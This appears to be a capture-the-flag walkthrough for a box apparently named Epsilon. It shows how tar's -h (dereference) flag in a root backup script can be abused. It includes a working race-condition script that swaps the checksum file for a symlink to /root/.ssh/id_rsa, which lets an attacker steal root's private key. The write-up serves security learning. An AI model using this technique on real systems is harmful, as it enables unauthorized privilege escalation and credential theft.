Abusing dereference
Reviewing the code inside we get this:
1
2
3
4
5
6
7
8
9
#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*
As we can notice there is a stranger flag within the latest tar command which is -h:
1
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
After reading the manual for tar, we can see that this flag is used to follow symlink and dump the file that is pointing to:
1
2
3
4
5
6
7
8
9
10
--exclude-vcs-ignores
Exclude files that match patterns read from VCS-specific ignore files.
Supported files are: .cvsignore, .gitignore,
.bzrignore, and .hgignore.
-h, --dereference
Follow symlinks; archive and dump the files they point to.
--hard-dereference
Follow hard links; archive and dump the files they refer to.
With this in mind then we can start a race condition to delete the checksum file which is being generated and then insert our symlink pointing to an interesting file that allow us to escalate privileges (root id_rsa for example):
First we need to create a script that checks when the file checksum is generated, remove it and create our symlink instead of it pointing to the id_rsa from root, exactly like this:
1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash
while true
do
if [ -e /opt/backups/checksum ]
then
rm -rf /opt/backups/checksum
ln -s /root/.ssh/id_rsa /opt/backups/checksum
break;
fi
done
Examples: Epsilon